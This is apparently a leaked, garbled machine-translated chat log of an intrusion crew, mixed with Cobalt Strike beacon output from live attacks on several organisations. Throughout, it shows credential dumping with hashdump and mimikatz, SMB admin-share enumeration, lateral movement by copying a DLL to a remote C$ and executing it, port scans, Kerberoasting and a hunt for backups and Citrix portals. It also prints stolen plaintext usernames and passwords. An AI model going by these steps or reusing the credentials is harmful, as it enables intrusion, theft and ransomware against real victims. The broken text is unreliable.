2224 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2256 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
2380 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2492 752 svchost.exe x64 0 NT AUTHORITY/\LOCAL SERVICE
2508 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
2552 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
2560 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
2728 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
2764 752 SgrmBroker.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2788 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2896 752 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
2920 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2984 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3024 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3028 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3076 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
3156 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3224 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
3320 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
3332 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3344 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
3372 752 MsMpEng.exe x64 0 NT AUTHORITY\SYSTEM
3412 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
3492 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
3504 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3520 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
3724 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
3904 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3924 752 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
4000 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
4068 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
4208 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
4336 752 securityHealthService.exe x64 0 NT AUTHORITY\SYSTEM
4400 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
4788 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
4812 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
5212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
5236 752 NisSrv.exe x64 0 NT AUTHORITY\LOCAL SERVICE
6044 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
820 656 lsaIso.exe x64 0 NT AUTHORITY\SYSTEM
828 656 lsass.exe x64 0 NT AUTHORITY\SYSTEM
672 648 csrss.exe x64 1 NT AUTHORITY\SYSTEM
760 648 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
76 760 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1
1064 760 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
1216 760 dwm.exe x64 1 Window Manager\DWM-1
``get the full list of processes here,``
only on 2 windows 10
``:thinking:but he has access to the admin ball or says that the current user is not LAELWAYS spam sessions without *she will try to do something about it about the current machine oddly shortly this user has admins only on 2 windas 10enterprice (empty), on 1 servak (current machine), the other 319 are Windows education, computers in the students, they have nothing to catch it and was going to do and tell me whether there is a server OS from the old list of hosts with admin balls turns out so that now we have that yesterday's polozak?i have no usernames and passwords at all and i started reshooting the ballsvirtually 20 minutes ago i restored it via Citrix as i came with it a session hung for 8 hours i wrote that polzak session or login / pass remained? no polzak the same? now i will download it again, yesterday you were from there selected hosts with admin balls? i mean the previous output list was not added more job just hung everything that has collected ```
[*] Parsed 7530 computer objects.
Shares for CONDORCLUSTER:
[--- Unreadable Shares ---]
ClusterStorage$
IPC$
Shares for WILDCATNEW:
[--- Unreadable Shares ---]
IPC$
Shares for COB-62001:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for chem-62837:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ccdc Chalk Research Group's Public Folder Chalk, Stuart's Public Folder chembl COASAdmin's Public Folder donh's Public Folder ncct nistsdm trc
Shares for CEC-59126:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$ E$ F$ K$ print$
Shares for WILDCAT:
[--- Unreadable Shares ---]
IPC$
Shares for Coppicecluster:
[--- Unreadable Shares ---]
ClusterStorage$
IPC$
Shares for ThicketA:
[--- Unreadable Shares ---]
IPC$
Shares for primrose:
[--- Unreadable Shares ---]
IPC$
Shares for hedgea:
[--- Unreadable Shares ---]
IPC$
Shares for ThicketB:
[--- Unreadable Shares ---]
IPC$
Shares for BriarA:
[--- Unreadable Shares ---]
IPC$
Shares for ThicketC:
[--- Unreadable Shares ---]
IPC$
Shares for PHYS-65427:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65428:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65430:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-63941:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65439:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65440:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65435:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65438:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-63945:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65433:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65437:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-63943:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65432:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65442:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-63947:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHYS-65441:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$ print$
Shares for PHYS-65436:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$
Shares for thicketd:
[--- Unreadable Shares ---]
IPC$
Shares for ThicketE:
[--- Unreadable Shares ---]
IPC$
Shares for CEC-66268:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$ Users
Shares for PHL-66859:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for CEC-63643:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$ print$
Shares for PHL-66860:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66886:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66897:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66872:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66891:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66868:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66865:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66866:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66882:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66885:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66884:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for PHL-66892:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66368:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66375:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66373:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66382:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66400:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66377:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66381:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66394:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66385:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66396:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66397:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66384:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66392:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66401:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66386:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66399:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for ITST-66393:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$ C$.
Shares for mus-63011:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
Administrator's Public Folder Biernacki, Krzysztof's Public Folder Daugherty, John's Public Folder Hines, Clarence's Public Folder Pavlesich, Adina's Public Folder Studio Lessons's Public Folder n00865522
``Give me the whole list of npc with admin balls under the current polzacompletion on another machine in another give out but this again only in this session
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results.
``hashdump with minus comes out but computer itself seems to be neutered in one way or another, i.e. there is output, etc.
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
```
```
beacon> jobs
[*] Tasked beacon to list jobs
[+] host called home, sent: 8 bytes
[*] Jobs
JID PID Description
--- --- -----------
17 12304 process
```
```
beacon> shell copy x64.dll \139.62.66.77\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.66.77\C$\ProgramData
[+] host called home, sent: 73 bytes
```
```
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
Volume in drive C has no label.
Volume Serial Number is CA3E-DD31
Directory of C:\ProgramData
12/02/2020 04:31 AM %LOCALAPPDATA%
12/01/2020 04:27 PM 272 2013.par
04/07/2018 11:09 AM 35,888 3002.abs
05/02/2015 07:50 PM 15,568 3029.abs
11/11/2019 05:42 PM ABBYY
10/12/2020 01:43 PM Adobe
11/20/2020 09:32 AM
``Certainly in the session from which I could not push the dailka to other computers, mimic worked with an error, google pinged, tht with the balls through the shell type output in this output is, but not from all previous after the adfynda first did not work, then broke, it feels like the response was just 10 minutes, although Hartbit about 3-5 seconds were you in both kobs in bicon output does not fly from the network?but i'm talking specifically about the current network, the scanners are not sleeping in the new one, which is wikibros.com, today came a lot of left-handed sessions
the previous one, which is likenic.com, went in yesterday and there were a bunch of sessions of 500-800 hours of slack I gave you the additional koba you have in both koba such anomaly arrives? by the waykoba in bl got 90%) did not come to me understood I made a case in an existing session there is a host calls home, but no output in bicon?
in short, from that session, the call to the other computers didn't work
```
there is no output not working and i can't copy it, i can't copy from that session, i just went back to Citrix and saved myself yesterday's starting session, i'm reshooting the balloons just in case, there will be more, and i can spam, waiting until one has 10 unterricks mainly windows 10 unitedcation as yesterday i have access to windows 10 unitedcation, made style token, injected into user's process, session either does not appear, or appears stillborn@tl1 so you fix it since there are system sessionsIn general, the session where there was a user I jumped out, the system remains, there is another user, now I will jump into his process and will watch the balls againl then dsync hereDCSYNC removed; looking for cloud-administration of Webroot SecureAnywhere in the spn is` >servicePrincipalName: exchangeAB/JDODC67.jdossn.local` - it is pinged. What to do with it? in ad_users there is something like ` smtp:NHNorRAremb@jdisonline.com` but `jdisonline.com` is not resolved google, hotmail, yahoo, etc.in browsers they have public servicesseka also if you took off the browsers where they have mail? or in spns can be written exchangemailEX also? =)no one with a name that has `exc` I'll check and you see the exh server? it's a pinged list of servers and how to find it? from where i am, most of them don't seem to be visible at all did you scan the diapasons? the webserver that holds citrix authorization is VERY often not in the domain i check this list via dirb``.
[+] 172.31.45.14: - 172.31.45.14:80 - TCP OPEN
[+] 10.99.202.247: - 10.99.202.247:80 - TCP OPEN
[+] 10.99.205.75: - 10.99.205.75:80 - TCP OPEN
[+] 10.99.195.11: - 10.99.195.11:443 - TCP OPEN
[+] 10.99.202.247: - 10.99.202.247:443 - TCP OPEN
[+] 172.31.190.157: - 172.31.190.157:443 - TCP OPEN
[+] 10.99.198.60: - 10.99.198.60:443 - TCP OPEN
[+] 10.99.193.18: - 10.99.193.18:443 - TCP OPEN
[+] 10.99.198.60: - 10.99.198.60:80 - TCP OPEN
[+] 172.31.45.15: - 172.31.45.15:80 - TCP OPEN
[+] 10.99.205.75: - 10.99.205.75:443 - TCP OPEN
[+] 10.99.202.181: - 10.99.202.181:443 - TCP OPEN
[+] 10.99.201.43: - 10.99.201.43:443 - TCP OPEN
[+] 10.99.193.24: - 10.99.193.24:443 - TCP OPEN
[+] 10.99.193.24: - 10.99.193.24:80 - TCP OPEN
[+] 10.99.201.43: - 10.99.201.43:80 - TCP OPEN
[+] 172.31.45.20: - 172.31.45.20:80 - TCP OPEN
[+] 10.99.193.18: - 10.99.193.18:80 - TCP OPEN
it's not necessary that you just have a direct redirect from the host on the port which under soks can pro brute-force the right way look there are such utilitiesdirb / dirbusThen yes. I understand it is a local hostname or address I did not specify an external domain is on the local I suggest to check not, in amazon 2FA. I check on the local I do not think that climb in amazon worth vobshek as I pinyal, they used to have their citrix - after him left a certain number of servers. Now they're in the cloud on amazon. And it looks like it's not their Citrix, but John Deere's, and it has ldap authorization bolted on to it. I'm looking on their local servers now - maybe there's something left...take all the hosts that open on port 80/443
Run a dirbuster on the format
https://hostname/vpn/index.html
or at
https://ipaddr/vpn/index.html``
https://*domain.com/vpn/index.html
```
here's the default path to the citrix login.
i'm a little confused maybe...but why citrixxpreselect all live servers with a hint of citrix in the name or descriptionwhat i'm trying here i found that it is not login but cgi/loginda. and http and https https added? the name of the computer does not have to = server name login - also self come here https://....../login so go to the name is about that, the name might show something ... 80 is the same and tcheck 80 and 443 ports can be specified by name or by name it is a separate configuration block access by ipdalfnu htrs. for example nginx if configured - it gives by name, but by ip on 404 blameduethe scheme http(s) why? well, within the domain that just a web server can not give anything when accessing ipsysteminfo, ipconfiglocal - what? and then how can all the local DNS to rent? what is available and local.here's another question - there are Citrix Delivery Controllers, there is Citrix Director probably something else is it. I have what to look for? as an option to prescribe in the hosts domain to the local ip Citrixshekas will trynu yes, just log in that will be by IP - auto redirect will not work443 80the same web admin port) port what citrix? 80????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
beacon> portscan 3.15.36.195 80,443 icmp 2
[*] Tasked beacon to scan ports 80,443 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``Yeah, ldap is probably connected but I don't think it's part of the domain then 80 and 443`` ``
beacon> shell ping signon.jdisonline.com
[*] Tasked beacon to run: ping signon.jdisonline.com
[+] host called home, sent: 57 bytes
[+] received output:
Pinging ok11-crtr-custom-domains-cd76c2bd4d92725a.elb.us-east-2.amazonaws.com [3.15.36.195] with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Request timed out.
[+] received output:
Request timed out.
Ping statistics for 3.15.36.195:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
beacon> portscan 3.15.36.195 445,139 icmp 2
[*] Tasked beacon to scan ports 445,139 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``Can you see ports 445,139 445? ping what? if citrix, amazon. but samaccountname from local domain is specified in settings? their servers may be on amazon in some strange place. but it seems they have different settings. two of them ask for 2FA when they login and one of them asks for 2FA when they change their settings here too ``.
--- Chromium Credential (User: ndmicjsater) ---
URL : https://jdoapps.jdisonline.com/cgi/login
Username : ndmicjsater
Password : NDleading22
Is it okay if it's their server or not? It looks like they dragged the Citrix servers to amazom. is that okay?
>memberOf: CN=NDLEADING_Citrix_Local_Drives,
``Then take down the browsers where you can and look for citrixstrannotut and the usual polzacs no more. and the AD_comp `34648 Objects returned`` external?
UserName : jdodmp_svc
ComputerName : JDODC67.jdossn.local
SessionFrom : 204.54.154.136
SessionFromName : JDODMP03.jdossn.local
LocalAdmin : False
they are not in this subnet and can't see them from here (so go to the DAE PC and take their hash off) practically. on the DAE does not let in all? and not the servers does not let in. on the user PCs the same LA, so you only go to the user PCs? i dont remember, i think i checked. i don't remember. i think i checked it again.
>uSNCreated: 63484
>memberOf: CN=NDLEADING_DPARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_PARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Citrix_Local_Drives,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_SDK_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Technicians,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Schedulers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Managers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Reports_Drive,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPRDB-ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPPatch_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Dealer_Portal_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
``Where did you find webroute access not YES? they administer under LA only in kerbaha nowhere YES? yeah dunno. now 10 active. i think i went through all the available pk on the available? and yes, i can not go out of the local network and i can not take the yes? and you have already found the admin? ah, no))) i also have a webrout stoit you already found the admin in the second network? and you have not mixed up the group? no. neighborxox threw from the car polzak where did you take access?
```
--- Chromium Credential (User: ndmicjsater) ---
URL : https://my.webrootanywhere.com/default.aspx
Username : jasons@leadingedgeequip.com
Password : jsateren8726
```
but there still asks for confirmation code 2FAtry through RDPoping. went through smb_login - among those where the codes fit there are 2 servers with open RDP.pinging the list of servers, for the following smb login ``.
beacon> shell wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[*] Tasked beacon to run: wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[+] host called home, sent: 104 bytes
[+] received output:
Node - 172.31.190.103
ERROR:
Description = The RPC server is unavailable.
\remote-exec wmi 172.31.190.103 rundll32 \\172.31.190.103\testvolume\GH-GHNS-DHS_Copy\office365\mui.dll entryPoint\remote-exec all three methodsa run how?[ ](https://mediaeveryone.com/group/snpartners-com?msg=apMHH3c8mKdEeZrMmh) Well on NAS it is not wind most likely )) no, maybe you can put it in the group yes? about failed to start the dll ie? do not change the passwords on the other is just a user. on NAS to start the dll did not work. He has rights to change passwords, as I understand it. Is there any way to use this?[ ](https://mediaeveryone.com/group/snpartners-com?msg=4pFWzF5wGgrJ9usov) and there are no other accesses?
```
Username : nddevbernst
Password : NDleading2021!
``only to custom ones. some to the aggressor whale
could you send me a link to a netlogon that worked and the admin above is nowhere to be found? i need to duplicate it in the confuscha let me duplicate it again, i lost the 445 port results file what kind of pc? all sannets from the adfind on /24 scanned, only 3-4 computers in the game did you look for vg and external backups? in spns is hyper-v replica service on several machines, this is the maximum i saw
0 trusts
37 servers
1205 armies
i think if you pinged it, it would be much less and how many servers, armies and trusts us, i looked there, iscsi is empty
there's ehs, no creed
there are two servers
bgukhoveam there's a tiny bit of .bco-shares
bally44backup there's a lot of backups
nothing else found a la wsphere, hypervisors, etc[ ](https://mediaeveryone.com/channel/general?msg=zbgfwydjaxhwyWEwu) any signs of cloud solutions? let's complicate the process today, let's check the WOL. then write to the group the number of pcs, arms and trustschromium admins, chromium all polozakonea, ran through all computers where admins sat yesterday then today we close, admins surely had no hints of claud or vg on backups?yes[ ](https://mediaeveryone.com/channel/general?msg=WGerCebrheZx2Wd3o) there are all found, what do I need? found one more guy, his credentials do not bring up a session on three computers. i remove the credentials from them via CME[ ](https://mediaeveryone.com/channel/general?msg=TQsXdkctah9AnbJNo) the same thing
There are a couple of subnets left to scan.
so far nothing in bellimore still in search of the creeds from the echyotr write down, what are your results? in preparation for closing in balimorladno, clarified. if you are done with the lab go to the networks[ ](https://mediaeveryone.com/channel/general?msg=HMAxxaonYPKBkydbG) 3 days ago I tried to build a server, at what time do not remember. fuck.... I'm already confused on all sides.or am I misunderstanding? just not setting up and building the server so you were still busy with lab 3 days ago? for lab, should have been but nothing started on it. I put it aside, it's at my desk. Then I brought a different office on it started up and now it's spinning. Do you want me to describe the hardware? [ ](https://mediaeveryone.com/channel/general?msg=5ywWviKNjaaKB8v2B) and this [ ](https://mediaeveryone.com/channel/general?msg=NMJXZRRGGaRR3RnGr) + [ ](https://mediaeveryone.com/channel/general?msg=FvaSSFmTR9MEnhQP6) I already saw it, it's just 16 minutes on the 22nd, counted as three days[ ](https://mediaeveryone.com/channel/general?msg=cxkivPJYBETLt6ffr) pieced together = assembled? What kind of server? 100% Yesterday today I did lab, I can't tell you. Before that I was piecing a server on a Chinese mother that does not fuckin' work! that was three days ago. so yesterday and today? yeah, yesterday. not much sleep. i don't remember what happened three days ago.
I sign up uni yesterday yesterdayrahm, maybe I'm already confused uni it was yesterday ? gave you an individual problem on the vpn like, which then @user7 left, strong strong and so on)you said that the lab I remember the day before yesterday I asked you to work on the net finished about 10 minutes ago. Do not count in hours. I think since yesterday, wrote to you. how much time was busy with this task?
Finished with webmords, doesn't take much off
found:
1 ushi (no creeds)
1 us (no kreds)
iLO 4 ProLiant
iLO 54 ProLiant
the last two things have not figured out what they are, and no Credits
iLO 4 ProLiant 54 ProLiant not yet figured out what they are, well, there are no Credits
main.crispregional.org
```
also looking for hints on the backups in the vg and the cloudswrite at the same time, that on the tasks of all, let's move on to the main tasks thank you tell me that he has 10 minutes to contact the boss promptly call pliz @ot let him answer bosu and here we are all trying to make sense of this situation if not then it turns out that @ot himself checked, none of us have checked so, aware of this kitchen were only @ot and @user3 no) and you sent them to check?what's the problem with the tests? we don't know about it, only @ot does. ask the others about the tests - @ot
tests - I don't know
lab - @ot and @user3
the last one is closed, @user3 was busy configuring it so in order, who did the interviews, tests, labs maybe someone will have problems depending on your answers)okay, never mind, what do you mean by that? and i also talk about tests and labs we talk about the tests and the interviews specifically labs i mean what works with it, from what i observe, @user3 and tests who checked?@ot who conducted the interviews? so? so she rather under the direction of @user3 over which @user3 still works eeetu labaa)ot2 is it who you know about the lab, tests and other things under the direction of @ot? distracted yet? then they immediately 1 dk and picked up the same pdkvot 1 dktakta all ok?
List of DCs in Domain
\\WDC1 (PDC)
``I did
`shell nltest /dclist`
without `:````
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Get list of DCs in domain '' from '\\WWDC1.waterway.com'.
You don't have access to DsBind to (\\WWDC1.waterway.com) (Trying NetServerEnum).
List of DCs in Domain
\\WDC1 (PDC)
The command completed successfully
``shell nltest /dclist:````
beacon> shell net accounts
[*] Tasked beacon to run: net accounts
[+] host called home, sent: 43 bytes
[+] received output:
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 90
Minimum password length: 6
Length of password history maintained: 10
Lockout threshold: 15
Lockout duration (minutes): 5
Lockout observation window (minutes): 5
Computer role: WORKSTATION
The command completed successfully.
``nltest output
beacon> net domain
waterway.com
beacon> net domain_controllers
Domain Controllers:
[-] Error: 0
beacon> shell nltest /dclist:waterway.com
Get list of DCs in domain 'waterway.com' from '\\\WWDC1.waterway.com'.
Cannot DsBind to waterway.com (\\WWDC1.waterway.com).Status = 1722 0x6ba RPC_SERVER_UNAVAILABLE
I_NetGetDCList failed: Status = 6118 0x17e6 ERROR_NO_BROWSER_SERVERS_FOUND
beacon> shell net accounts /dom
The request will be processed at a domain controller for domain waterway.com.
System error 5 has occurred.
Access is denied.
``but just throw in the slip commands slipkbut check if the domain is alive or not)``with waterway 2 sessions sleeping#ballymoregroup-com
found ESXi, no credits yet
checked all my DA's with sniper - they are sitting on servers, in chrome only one had password without username from unopened snout
Checking of scanned interfaces is in process.
sniper check all sysadmins and i.t. guys in the process I have a couple of sessions in the slipway, the water I have not seen nimble here, hashes are different, but not valid nimble is dead? all empty? not even hashes are different? 6 Computers where he was with the rights pulled and in them for now and stay. la was you did not have YES? hashes gave tl2 so far nothing interesting, other than what I wrote in the conf, did not findKred still not found, run the invey and caught some interesting information - the assumption that previously found seven in the yr and not in the domain looks reasonable, because found several other similar compounds. Scan the subnets to 445 443 22 80. Search the files on the computers where you have access to do not forget the cloud solutions.
main.crispregional.org
```
There is a sphere, av, backups
Looking for backups in the groups in `CORP.TELEVISA.COM.MX` I`ve jumped into `CORPSFECRT04` there is nothing on the creeds, now I'll go further untwisted Write down the status of work to get there. like any creeds fit there, but only as a normal polozaki maybe something like that : //www.zoller.info/en/products/tool-management/storage-systems/keeper) and what the drill can not kill? yeah hz. they sell weapons, and these drills assumption : //www.zoller.info/en/home?r=1```
10.0.0.24 0EA78803 [Win Embedded Standard 7601 SP 1]
Probably because it's some kind of cut-up sevens but you need prufy as a variant - that's the name of the title inrssu.com looking for the rights creeds. While I was looking for found ``.
(platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
``and now looking for confirmation of a second domain, who works with it? access and other stuff, and looking for external, internal storage, and the quality of the locale itself, we'll give up on that about creating backups
looking for backups, auth, then listings skul, mail, filescredits only no backups found#ballymoregroup-com
check the web muzzles that naskanii naskanii write what are you doing? in another) push @user7 into the confab to see where everyone is at? hello:space_invader:everyone say goodbye until tomorrow it is mandatory items + cloud check backups in vorkgroups tomorrow will close a couple of networks and tomorrow by 6 pm will finalize `benihana.com
starting user is neutered, kerbs are removed, hell is removed, ShareFinder is dropped
`ballymoregroup.com
found 2 nasa, one dead
2 backup servers found, listings made
2 exch of hell not pinging `Ping request could not find host`
pinging whines in the process
LA starter user on several machines. Went everywhere took off browsers, hashdump and mimic. From all of this found two different hashes YES, but apparently old. No Kerbs - writes something like ``[X] No users found to Kerberoast!
``````
main.crispregional.org
```
What's left:
backups to find, optionally AV tomorrow by 4 I think half an hour more, what are we up to today?
```
main.crispregional.org 10.1.20.213 SYSTEM * PROVATIONTEST
